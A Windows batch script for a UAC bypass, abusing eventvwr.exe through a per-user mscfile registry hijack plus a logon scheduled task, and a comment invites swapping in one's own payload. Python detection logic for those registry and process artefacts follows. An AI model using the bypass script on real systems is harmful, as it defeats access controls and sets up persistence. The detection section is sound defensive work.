- @ECHO off
- TITLE Pope BGNT's UAC bypass
- DEL %target% /f
- ECHO SchTasks /delete /tn "Rebooty Call" /f >%target%
- ECHO SchTasks /create /tn "Rebooty Call" /tr "C:\Windows\System32\eventvwr.exe" /sc ONLOGON > %target%
- ::Set eventvwr to run the above file.
- REG ADD "HKCU\Software\Classes\mscfile\shell\open\command" /ve /d "%target%" /f
- ::Run eventvwr.exe to create the logon scheduled task.
- START eventvwr.exe
- ::timeout to allow eventvwr to do its stuff, otherwise there is a race condition.
- ::This won't work on Windows XP, replace with a delay using PING
- TIMEOUT 1
- ::Create the payload file, replacing the file created above. THIS IS THE PART YOU SHOULD SWAP FOR YOUR OWN SCRIPT/PROGRAM!
- DEL %target% /f
- ECHO ECHO result=MsgBox("IT WORKS! IT WORKS! YAY!" , 0+48, "UACBypassed") ^> test.vbs >> %target%
- ECHO ECHO WScript.Echo result>> %target%
- ECHO test.vbs>> %target%
- ECHO DEL test.vbs>>%target%
- ECHO ECHO I EXIST AT TIME %%time%% ^> C:\confirmationFile.txt>> %target%
- ::start eventvwr and thus the payload file.
- START eventvwr.exe
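
For defenders, the script above leaves two observable artefacts: a value written under the per-user `mscfile\shell\open\command` key, and `eventvwr.exe` starting whatever that key names. The following is an added example, not part of the paste: detection logic run over constructed Sysmon-style records. The field names, the sample events and the treatment of `mmc.exe` as the expected child process are assumptions.

```python
import re

# Per-user override of the mscfile "open" verb. Covers HKCU\Software\Classes\...
# and the HKU\<SID>\... / HKU\<SID>_Classes\... spellings a log source may use.
MSCFILE_KEY = re.compile(
    r"^(HKCU|HKU\\[^\\]+)\\(Software\\Classes\\)?mscfile\\shell\\open\\command",
    re.IGNORECASE,
)

# Constructed sample events (not real telemetry); field names are assumed.
SAMPLE_EVENTS = [
    {"EventID": 13,  # user-hive override: should be flagged
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001_Classes\mscfile\shell\open\command\(Default)",
     "Details": r"C:\Users\Public\example.bat"},
    {"EventID": 13,  # machine-wide key: not the per-user hijack
     "TargetObject": r"HKLM\SOFTWARE\Classes\mscfile\shell\open\command\(Default)",
     "Details": r'%SystemRoot%\system32\mmc.exe "%1" %*'},
    {"EventID": 1,   # assumed normal child of eventvwr.exe
     "ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Windows\System32\mmc.exe"},
    {"EventID": 1,   # unexpected child: should be flagged
     "ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Windows\System32\cmd.exe"},
]

def classify(event):
    """Return a finding string for a suspicious event, else None."""
    eid = event.get("EventID")
    if eid == 13:  # registry value set
        if MSCFILE_KEY.search(event.get("TargetObject", "")):
            return "mscfile handler set in user hive -> " + event.get("Details", "?")
    elif eid == 1:  # process creation
        parent = event.get("ParentImage", "").lower()
        child = event.get("Image", "")
        if parent.endswith("\\eventvwr.exe") and not child.lower().endswith("\\mmc.exe"):
            return "eventvwr.exe spawned unexpected child -> " + child
    return None

def scan(events):
    """Collect findings for every event that classify() flags."""
    return [finding for finding in map(classify, events) if finding]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Because the override lives in the user's own hive, alerting on any value under that key is low-noise: a default installation only defines the handler machine-wide.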